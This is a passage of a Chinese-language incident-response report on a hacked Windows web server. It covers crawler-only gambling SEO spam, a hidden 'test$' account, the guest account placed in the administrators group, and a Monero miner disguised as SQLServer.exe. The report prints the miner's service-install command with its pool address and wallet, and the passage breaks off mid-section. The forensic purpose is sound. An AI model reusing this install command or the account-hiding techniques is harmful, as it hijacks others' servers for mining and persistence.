本文是前段時間處理某用戶被黑的分析總結，用戶被黑的表現是使用爬蟲訪問用戶網站的首頁時會出現博彩關鍵字，而使用正常瀏覽器訪問時無相關的博彩關鍵詞。這是典型的黑帽SEO的表現，針對這種技術，前期文章已有相關分析，感興趣的同學可以看一看。
此次分析，發現用戶的服務器被多波不同利益的黑客入侵，里面有一些比較有意思的內容，所以特意分析總結了一下。
一、概述
1、分析結果
經過分析，目前得到以下結論：
1）服務器上存在博彩信息與挖礦程序，說明被多波不同利益團隊的黑客入侵；
2）此服務器于2018年9月21日被黑客入侵后加上相應的博彩內容，相應的IP為175.41.27.93；
3）此服務器在2016年2月份甚至更早就已經被黑客植入網馬了；
4）服務器在2017年12月19日被植入挖礦程序；
5）系統被增加了隱藏賬號test$，并且在2018年9月21日14:38發現賬號guest有IP為212.66.52.88，地理位置為烏克蘭登錄的情況。
二、分析過程
2.1 入侵現象
2018年9月份，通過我司監測平臺監測到某網站被植入博彩內容，具體如下：


網站被植入博彩信息
網站被植入博彩基本上說明網站被黑客入侵，我司“捕影”應急響應小組立即協助用戶進行入侵分析。
2.2 系統分析
系統分析主要用于分析其系統賬號、進程、開放端口、連接、啟動項、文件完整性、關鍵配置文件等，通過系統相關項的分析判斷其系統層面是否正常。對其系統層面分析，發現以下層面存在問題：
系統賬號
對系統賬號的分析，目前發現系統存在以下賬號：
Administraotr、MYSQL_ZKEYS、test$ 、zhimei、renjian、APP_IWAM_61264026、APP_IWAM_6127201、guest
其中test$明顯為隱藏賬號，一般情況下系統管理員不會增加隱藏賬號，該賬號肯定為黑客增加。另外幾個賬號，如zhimei、renjian等為可疑賬號，需要管理人員進行確認。


系統賬號情況

管理員信息
管理員組中存在administrator和guest，一般情況下guest為來賓賬號，不會增加到管理員組中，懷疑該賬號為黑客增加到管理員組中。
系統賬號存在兩個問題：
1）服務器被增加test$隱藏賬號
2）Guest賬號被加入到管理員組中
日志分析
通過相關安全產品的日志，可以看到guest賬號于2018年9月21日14:38被IP為212.66.52.88的烏克蘭IP登錄，該賬號密碼肯定已泄露，建議禁用該賬號。

進程與服務分析
對其服務器分析，發現其服務器的CPU利用率非常高，利用率為100%。發現主要被SQLServer.exe占用。

CPU利用率為100%

SQLServer.exe占用CPU最高
找到該程序所在的目錄，發現該程序放在C:\ProgramData\MySQL目錄下，并且被目錄被隱藏。里面有四個文件，兩個bat文件，兩個exe文件。

【Startservice.bat功能分析】
對startservice.bat進行分析，其內容如下：

其功能如下：
1）set SERVICE_NAME=SystemHost，指定其服務名為SystemHost：

2）Tomcat9 install"%SERVICE_NAME%" SQLServer.exe -o stratum+tcp://pool.minexmr.com:7777–u 49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt
7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F -p x -dbg -1-t 0
使用Tomcat9 安裝相應的挖礦程序，挖礦參數分析：
礦池地址
pool.minexmr.com
礦池端口
7777
礦工賬號
49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F
挖礦程序被植入時間